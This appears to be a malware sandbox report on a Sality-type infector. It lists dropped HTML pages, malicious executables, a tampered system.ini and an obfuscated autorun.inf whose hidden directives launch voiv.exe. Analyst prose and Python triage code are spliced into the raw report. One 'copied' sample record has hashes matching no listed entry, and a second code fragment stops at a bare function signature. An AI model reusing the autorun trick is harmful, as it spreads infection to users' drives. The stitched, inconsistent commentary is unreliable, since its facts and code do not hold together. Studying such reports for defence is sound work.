                                                                                                                                                                                                                                                                                          SHA1:E718678F33C184A3F1926CEA56F183BA0C1BC63D
                                                                                                                                                                                                                                                                                          SHA-256:0D085ABEAE0AE7F4016B73281427C9AA4319F0062B60FE52B2C0D12A1C0B015A
                                                                                                                                                                                                                                                                                          SHA-512:FFD9B47675F3C50843983FDF4F04D45172A961FBD1C7DFBEEC56A78A1B8D1B891D50714B02567048E0CBC626ADC7FD883660AC924C3426B73D0ECAF8DF078584
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE2Mi4zNTMzOjEzOThmMGYyYmVlN2FkZTU1MTA1ZTRhZTczMWU5NDJjYjc4Y2M5ZWEzZGI5MWM5YzA4NjU5ZDc3ZTNkOGI3OWI6NjcxMjNiYTI1NjQyNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JhMjU2M2Y0fHx8MTcyOTI0ODE2
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6462342904136875
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFUcMqUtmtE9VCOHUcBDFrf3M7ioaxyi6CVCMTf992wP:n4Uh9VRhFyi1yi77l928
                                                                                                                                                                                                                                                                                          MD5:D1B6484758409A47896D5C73C3AE6982
                                                                                                                                                                                                                                                                                          SHA1:F8B551205B07CBD6F3C8359C9FCFDB0714D302D9
                                                                                                                                                                                                                                                                                          SHA-256:F1C3F67F7695BCB049A473B62E19555C03B0480D961590B22C1E3A579EACE4E6
                                                                                                                                                                                                                                                                                          SHA-512:D53760ECCAE162F040EE2BE9A2F85D7B7FF5B0459E49FE3F77C99F68F92E300DE7979F59A7EA302483386EB127CC526243B456D67F76B1618D0A1A75662896A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIzNi43NzkxOjEyN2ZjZDE0N2Y0MzViZjgwMmQ5NmE0ZmNlY2Y5MWUyYWExMGNhMDg3MTZmY2JhMjM3YjE0ODQxODczNmZkYTA6NjcxMjNiZWNiZTM3MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JlY2JlMzI2fHx8MTcyOTI0ODIz
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):66561
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976426841109004
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:uUvcBy8G6onrmCd/d7shmXfOaqH41KKsVMI0PawTnkWqkdu:uSHDrmg/mhiWaT4Vf0iwgWq5
                                                                                                                                                                                                                                                                                          MD5:A6D19E233BF430D143798D750270FCEA
                                                                                                                                                                                                                                                                                          SHA1:D0020645481058402C1420A0DEA88F7779AD0EBF
                                                                                                                                                                                                                                                                                          SHA-256:30C9ECE72D9F93A974B074BF256702E6C8168A17E2621F369A5BD54533AAA1C8
                                                                                                                                                                                                                                                                                          SHA-512:C28BC7803F8E0C8AAFF58347D425CA0423FE208353A1D7A0F3A5C6DFFE413E1DE0712C99B3CB911EFBB04336DB9F5377BF942E795B36643E35402553F12B602C
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................`. ................................................................_.n..~..F...S......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
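The dropped-file records above follow a simple Key:Value layout, which makes them easy to triage in bulk rather than by eye. The following Python is an added example, not part of the Joe Sandbox report: it parses records of that shape, recomputes the measure the "Entropy (8bit)" column reports, and lists which dropped files deserve follow-up and which SHA-256 values to carry into a blocklist. The sample text inside the script is constructed from two of the entries above (one parked-page HTML drop and the PE drop, previews truncated as on the page); the 7.5 bits-per-byte packing threshold and all function names are my assumptions, not anything Joe Sandbox defines.

```python
"""Triage helper for Joe Sandbox-style 'Dropped Files' records.

Added example, not part of the Joe Sandbox report. SAMPLE_RECORDS is
constructed from two entries of the report; thresholds are assumptions.
"""
import math
from collections import Counter

# Constructed sample: fields copied from two dropped-file records above
# (parked-domain HTML page, then the packed PE). Previews are truncated.
SAMPLE_RECORDS = r"""
Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.652220920703378
Encrypted:false
MD5:FF267AD5B1CF16F796230E372A4C6072
SHA1:747EA4B418EAA4C95EDFF68D677CE2186A7131F6
SHA-256:C4F9A9A10CA0C68FC0946A51DB276E5830B88F47B8ADD0314201E26E0FC9B4C8
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):66561
Entropy (8bit):7.976426841109004
Encrypted:false
MD5:A6D19E233BF430D143798D750270FCEA
SHA1:D0020645481058402C1420A0DEA88F7779AD0EBF
SHA-256:30C9ECE72D9F93A974B074BF256702E6C8168A17E2621F369A5BD54533AAA1C8
Malicious:true
Preview:MZ......................@...............................!..L.!This program cannot be run in DOS mode.
"""

# Assumption: a whole-file entropy this close to the 8-bit maximum usually
# means packed or encrypted content rather than ordinary compiled code.
PACKED_ENTROPY = 7.5


def parse_records(text):
    """Turn Key:Value lines into one dict per dropped file.

    A new record starts at every 'Process:' line. Only the first ':' splits
    key from value, so Windows paths such as C:\\... stay intact."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed
    bytes. This is the quantity the report's 'Entropy (8bit)' column shows."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_pe(rec):
    """PE by the libmagic description or by the MZ signature in the preview."""
    return (rec.get("File Type", "").startswith("PE32")
            or rec.get("Preview", "").startswith("MZ"))


def triage(records):
    """Return (record, reasons) for every dropped file worth a second look."""
    findings = []
    for rec in records:
        reasons = []
        if rec.get("Malicious") == "true":
            reasons.append("flagged malicious by the sandbox")
        if is_pe(rec):
            reasons.append("executable written by the sample")
            if float(rec.get("Entropy (8bit)", 0)) >= PACKED_ENTROPY:
                reasons.append("entropy near 8 bits/byte: packed or encrypted")
        if reasons:
            findings.append((rec, reasons))
    return findings


def iocs(records, malicious_only=True):
    """Sorted SHA-256 values for blocklists or retro-hunting."""
    return sorted(r["SHA-256"] for r in records
                  if "SHA-256" in r
                  and (not malicious_only or r.get("Malicious") == "true"))


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for rec, why in triage(recs):
        print(rec["SHA-256"], rec["File Type"], "|", "; ".join(why))
    print("IOCs:", iocs(recs))
    print("entropy of 256 distinct bytes:", shannon_entropy(bytes(range(256))))
```

Only the PE record is reported: it is both marked malicious and sits at 7.98 bits per byte, while the HTML drops are plain text around 5.6 bits and, by their content, parked-domain ad pages rather than payloads. The parser deliberately splits on the first colon only, since the Process values are Windows paths.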

Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (361)
Category: dropped
Size (bytes): 2265
Entropy (8bit): 5.652806959180236
Encrypted: false
SSDEEP: 48:+mazpFnxNMqUtmtE9VCO91VcBvQ43M7ioaxyi6CVXdUSMTf992wP:UxvUh9Vt8JQXi1yi7tULl928
MD5: 9E3E66E553497304FA0FEFBE32756751
SHA1: 17F4B7D65961DA0D89045353B7A2DBA63197F5B1
SHA-256: D87446362EF0A78B8080E1F3ED684F0893DE60FD548ABC4FAF921CE68B20FEC8
SHA-512: 7B190DF81E07CE307B69091BA87690D0BF79EDD404308417B4AB3D83E58B2138DDB34EAEBB6664E42E70E4645E83473076A827B697D83F9090C774AF8F100895
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEwOS4wMTYxOjZlNDZhZjI5ZGIzMDQ2MGRjYTJkNGEzNWY2YzY5YzMxOGQ5YTNlZmEzZDM1YjZlMmE1NzRhNzIzNWM1ZWQ1Yzg6NjcxMjNiNmQwM2VjNw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I2ZDAzZTk1fHx8MTcyOTI0ODEw

Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (361)
Category: dropped
Size (bytes): 2265
Entropy (8bit): 5.631827034956459
Encrypted: false
SSDEEP: 48:+mazpFlOIcwMqUtmtE9VCMcBop3M7ioaxyi6CV/MTf992wP:wvUh9VYGki1yi72l928
MD5: FB3750B62C54D340B231C470C0B2BA2A
SHA1: D6BF069E9F5EF301CA4E667C2C6BE46B031695B6
SHA-256: 25F81703247C23D8BF4DF809A0C7B651AFB6567C029BA7E0D7FFBA4E3E3B8CE6
SHA-512: D770D94C3AF260985E5FBC3C04E7E4E5B18FBD0E5C3722AA4BD6CB8DDEDC38C6CED27D71F0F40A0E54A5FC39EA01D21AFA9DFB63F62A2C43F9951027FBD06D94
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI4Ni45MTg4OjdkY2NhNTY1NmM4NDIwNzE5OGRhMGNjMjM4MDFhMmJhYWM3MjY5MDdmMmIwMDcyOWNhNjMwMDRjZDlhNDRjNzk6NjcxMjNjMWVlMDUzNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MxZWUwNTA1fHx8MTcyOTI0ODI4

Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 66561
Entropy (8bit): 7.975053528807288
Encrypted: false
SSDEEP: 1536:J99UU79L6NPegIlaIkjS1vv3crVlx+DXCM6bJBZ0t2W6y:J99UEd6xoyjS5oJ+rnybZNW6y
MD5: F0338C25E365C6651983230ADC39A294
SHA1: A57DDCD742ACD037EC923086CA7E56D907E10EC4
SHA-256: 5DB0A48FF3630250DA0EFE28945827F86E7B31C8B6EFF686D868EC69D6EB73F1
SHA-512: 90EF222B791FFE1C04BAEC4167C21657680350CB97DABF9BFED725A8251A126BCEA72402436194FDB6085C079C41C56FECA6909569C067DED2E47E4954733948
Malicious: true

Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (361)
Category: dropped
Size (bytes): 2265
Entropy (8bit): 5.649941046192796
Encrypted: false
SSDEEP: 48:+mazpFl2tMqUtmtE9VC9ucBZp3M7ioaxyi6CVtCQ+nMTf992wP:rUh9V6xIi1yi7tZl928
MD5: D029DFE4D3A210F3F1CD7C8DA0313E9D
SHA1: 73BEDDC08EAAF43A9F2DF1E5DC5DF9E4B58430C3
SHA-256: 40DED68891FEB38231659396427770EE19E7162B81F419948CD66733BBD2557F
SHA-512: 157750461B24105142A3D4090941C3C0688642CABBAA41D54162ADB1890738B62D49288CF03CCBD4CB8F5FD79FEE87C6C3B87F6848CD8B83103FB8C1041646E6
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI2Ni45MDI0OjgzODdjNDVmODg5ZmY3NGZmZmU4NmIzODBlZjc5OTQzZDczOGUxOGVhZjljYWEwNWE4NWI1ZmQ1Mjg2OWM0OWM6NjcxMjNjMGFkYzUwZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MwYWRjNGNmfHx8MTcyOTI0ODI2

Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (361)
Category: dropped
Size (bytes): 2265
Entropy (8bit): 5.658094921582102
Encrypted: false
SSDEEP: 48:+mazpFgDyquMqUtmtE9VC6WjUcBK3M7ioaxyi6CVY6MTf992wP:ZDuUh9V0jn3i1yi7YTl928
MD5: A76299999A06F9AA1A39BFA486450431
SHA1: 8FBB9E9BAA7256A39266E888CD9C692E9506BF9A
SHA-256: 50180ACA1C42A7E07E1ED34BFBAF5B1FA205E986B9BD8A43820ADAAAB2A3379A
SHA-512: 7E8FFFA6F56909DC3648C4529839923BD2F5B43A5E35A0A1F76EA07B44308A4F047DB34398BD108336C2668450C79CF24A4967028008CD648A7C85A7C6DDDFA1
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEyNy4yMzY4OjE3YzcyOWJhZDk5Y2VmOWM4NGY3MTdmNjViYTdjN2U4ODE0YWM1MDQ3ZGVmOGMzMWRhZmU0MGJhZGY4MGIzOTE6NjcxMjNiN2YzOWQwYw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I3ZjM5Y2NkfHx8MTcyOTI0ODEy

Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (361)
Category: dropped
Size (bytes): 2265
Entropy (8bit): 5.651837706487076
Encrypted: false
SSDEEP: 48:+mazpFcrvYMqUtmtE9VCL7cB7o3M7ioaxyi6CV1MTf992wP:dr8Uh9V3Ji1yi7Ml928
MD5: 0F904A4F450E9201D999843D9CE36310
SHA1: F62CF832C37B64215A4FCA0E508D0B2D15049A51
SHA-256: 688C501AC1150660A027EF78D9B8E10A10B704AFB6CC6717C443D2C4440FC735
SHA-512: 7770632846AA97FB6C0984525C95F910228A90F436B17D35259AB8970066852DF964E9D845F0A6CD39C844D82F7F282C37029014586B12AB0C7048E5C93174D7
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMxMC44MzQxOmNkNzliMmVhMjA2ZmQzNzJjNmE0ZjI1NjU0N2VjOTA4YWU2MGM5NGQ2ZjRkYmE5MTNhOGRlMjI1OTk4YTYzOTc6NjcxMjNjMzZjYmEyNw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MzNmNiOWY5fHx8MTcyOTI0ODMx
Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.645492188391314
Encrypted:false
SSDEEP:48:+mazpF/AMpk/MqUtmtE9VC885cBgs3M7ioaxyi6CVfUaMTf992wP:sPpgUh9VMu27i1yi78zl928
MD5:3899988519FBA02EF46E0EAA405315C7
SHA1:3D30F0AA351C3E758B2E990ABFE18BD60EC6FB95
SHA-256:555827DF3BC9F7C1912FA8D5BA428C6A3C3B9DD21040099810F9883342EAF2D5
SHA-512:5ECE3C56F84E3D87C9F2FDF0A0D4C2FC08787252D3FCBE66064C89DCBF1869D36EF901B4E68AEFFBF52AE17D8B72F33CD20D52EDE0D0DB9FE296D23CABE20BB7
Malicious:false
Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.662222995947943
Encrypted:false
SSDEEP:48:+mazpFGyMqUtmtE9VCGcBd3M7ioaxyi6CVeNMTf992wP:EUh9VO2i1yi7ekl928
MD5:444B37F57014F9C00858DD574E189D0B
SHA1:F38E94E60C96EAE8375619CB2C2D2742769FCEEC
SHA-256:ABB396D7AC794A57718D126AD4F5745A6ED25B138CF02908304C43295EAFB0C2
SHA-512:2731C5E3175225EE69636B2E965DE7668FD68656F68F00D97A295AFD5A90A5B26F3D8C9A8B83E24162CAB95C8C48C96A81F1B643249E07FB9B8D8FC6DCBBB205
Malicious:false
Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.650829442982286
Encrypted:false
SSDEEP:48:+mazpFxXdhNtGMqUtmtE9VCfcB/cs3M7ioaxyi6CVcMTf992wP:erWUh9V3Wi1yi79l928
MD5:0CCE3339CA8A67CDCFAA05A0AEDFE9D3
SHA1:A0929AD18D3B37031BF617FF197C911E552E42A6
SHA-256:80298056126DD309726AD118AA670E3EFB6DF1AF46B6F5DE01ADBD885E5AA564
SHA-512:0D6AAC71945C8C68D7EDA371E44FCCACDEF1ECAFABF1C03C5CB4B5C868A625C25B54F972DCD4991B7FFB8EBF80C0819F5B288C0CC60E6870D794F06BD846DBAC
Malicious:false
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:modified
Size (bytes):2265
Entropy (8bit):5.645861696505576
Encrypted:false
SSDEEP:48:+mazpFnQvMqUtmtE9VClqkkaWcBEzr3M7ioaxyi6CV9LHxMTf992wP:eQtUh9V/aZgii1yi7Fol928
MD5:0A32C8FB7691E0AAA157C952380B0AD3
SHA1:8BC54F4A9DC1D3B8C34EABC3CFB6473E8298E12A
SHA-256:35F8C676A62749671EAF91D0691F11219B8AD9E60462CE21375D83ADDEE474C2
SHA-512:51DE4203AA75EB16185FDC7399B03963447940B53AEBCBE912876B1081F00757228B0933CB05712F5CE437F13D3DB52A0D822239105F00B0073EB275D1C6A276
Malicious:false
Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.653778806192053
Encrypted:false
SSDEEP:48:+mazpFrEMqUtmtE9VC1LcBrg3M7ioaxyi6CV9lMTf992wP:mQUh9Vuwhvi1yi7+l928
MD5:28C5C081BC1A26A5C7016765E7AEF9A1
SHA1:72C34E9154B63F98FBC7B3AC979F1C4AB32500ED
SHA-256:0868BDA8FA3BF38FFE364CACF3846CA8ABD85E37D5D6CDBA1B1F8E1E5DD8653C
SHA-512:302AC5EFA7F5AD2993202C4C05ADBA66D9211321DBACEA314F31E94981090C4C465E531720B4E54053BF11E5F7BB9D9D857FE78FA90FE6E130AA0E7E6C9E1337
Malicious:false
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2496512
Entropy (8bit):7.9605067617139555
Encrypted:false
SSDEEP:49152:T546z5zoX35n+ZO6ZtdpdjivaAmOl9RxBrHTxAXMeQ78M:xz5SYBLpdjiaApl9RxBrHTxAX/Q78M
MD5:FA45B9C5E2A92B1B3D7D175C23FFC813
SHA1:5832CEF41CAD1BC57EA1424572A3127A5CCBA956
SHA-256:20D84DD8C73993A1012D7A9D9B837AA118182CB16DAF4169A266C0B48A708AF7
SHA-512:588DBA9ACC14A5A53502292D6DF9B54F5AEB4599F9A3AF1585D9E2403FAE5470DD58F3FA7C22D16BA04A75BBD27AF75C5E3FA1C5F46F2407B5EF17F3A1A7EE97
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 95%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type:Windows SYSTEM.INI
Category:dropped
Size (bytes):255
Entropy (8bit):5.266562852465586
Encrypted:false
SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPGm:F4Yv7yk3OUBq82wqFtP1
MD5:725AEE6E9973312BDD55AA038A13D38B
SHA1:6A1482C5D8D12177AEF24F1739F6DA58E8F4EFDA
SHA-256:2AE1A3BA916CB8512C01132ACA7423F1D6F0E71E8E410E352D043FADA6C87B24
SHA-512:2693501FCD8010A6418CC6D013DD4DA3F0C5E6EF8BAD8FCFD6E80107350C6DACAD22D57B219B7DF9F2F18770E04BF251313D752F4CBE62511BCCAEB62898AD49
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=67320627207..
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type: Microsoft Windows Autorun file
Category: dropped
Size (bytes): 315
Entropy (8bit): 5.499922934689373
Encrypted: false
SSDEEP: 6:a1KTmBtOPD/6qs4Qp6TN/PGFbk5ODwzXSArbCEqI8hSlIn:a0TTTG6TNGFboODwzXzrbe4I
MD5: C9C5B14EED4C058C347059C947CC2F98
SHA1: 4B78FCA7E6852AAD75F004517164857DC8814E3F
SHA-256: BA245F42EDB10A11798ABCB292627553A8AA02E89D940040EF48B751952BCE71
SHA-512: 3C67C0937D2D99A704EEDEA0762589C2BD9F19D905F3400C9524D349602AE92F5003F1F6CEE98E25F03A1BA5A2EDA87DD47255D058CBAE05A952CE5A0427752F
Malicious: true
Preview: [AutoRun]..;cfddnU VtMHqkmRv llDwDmnwnHp uwiJEhjcMNpeQdOD nlPGe ..;rLmYDsgBmiXxe..ShelL\Open\DeFault=1..;..ShELl\eXPlOre\COmMand = voiv.exe..;alNoShcyYt..oPEN =voiv.exe..;vosKeoxxw QoDrPxTMDRkgTxsuxjDiuTGa sfMsw RfogTIHLXqbss QerucnGd..SHelL\oPen\commaNd = voiv.exe..;gQipleYwbgC..SHELl\autOplaY\coMmaNd=voiv.exe..
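The two INI-style drops above (the modified system.ini and the autorun.inf) are what an analyst would write a normaliser for: the autorun.inf hides four launch directives, all pointing at voiv.exe, behind random-case keys, junk ";" comment lines and stray whitespace around "=", every one of which a case-folding parser discards; the system.ini carries a [MCIDRV_VER] section with a DEVICEMB value that a stock system.ini does not have, which is the infection marker Sality writes. The following is an added example, not part of the report and not code from the sample. The file contents are reconstructed from the report's Preview lines, reading the "." placeholders as CRLF (an assumption); the function names are made up here.

```python
# Contents reconstructed from the report's Preview lines. The report renders
# non-printable bytes as '.', so the CRLF line endings are an assumption.
SYSTEM_INI = (
    "; for 16-bit app support\r\n"
    "[386Enh]\r\n"
    "woafont=dosapp.fon\r\n"
    "EGA80WOA.FON=EGA80WOA.FON\r\n"
    "EGA40WOA.FON=EGA40WOA.FON\r\n"
    "CGA80WOA.FON=CGA80WOA.FON\r\n"
    "CGA40WOA.FON=CGA40WOA.FON\r\n"
    "\r\n"
    "[drivers]\r\n"
    "wave=mmdrv.dll\r\n"
    "timer=timer.drv\r\n"
    "\r\n"
    "[mci]\r\n"
    "[MCIDRV_VER]\r\n"
    "DEVICEMB=67320627207\r\n"
)

AUTORUN_INF = (
    "[AutoRun]\r\n"
    ";cfddnU VtMHqkmRv llDwDmnwnHp uwiJEhjcMNpeQdOD nlPGe \r\n"
    ";rLmYDsgBmiXxe\r\n"
    "ShelL\\Open\\DeFault=1\r\n"
    ";\r\n"
    "ShELl\\eXPlOre\\COmMand = voiv.exe\r\n"
    ";alNoShcyYt\r\n"
    "oPEN =voiv.exe\r\n"
    ";vosKeoxxw QoDrPxTMDRkgTxsuxjDiuTGa sfMsw RfogTIHLXqbss QerucnGd\r\n"
    "SHelL\\oPen\\commaNd = voiv.exe\r\n"
    ";gQipleYwbgC\r\n"
    "SHELl\\autOplaY\\coMmaNd=voiv.exe\r\n"
)


def parse_ini(text: str) -> dict:
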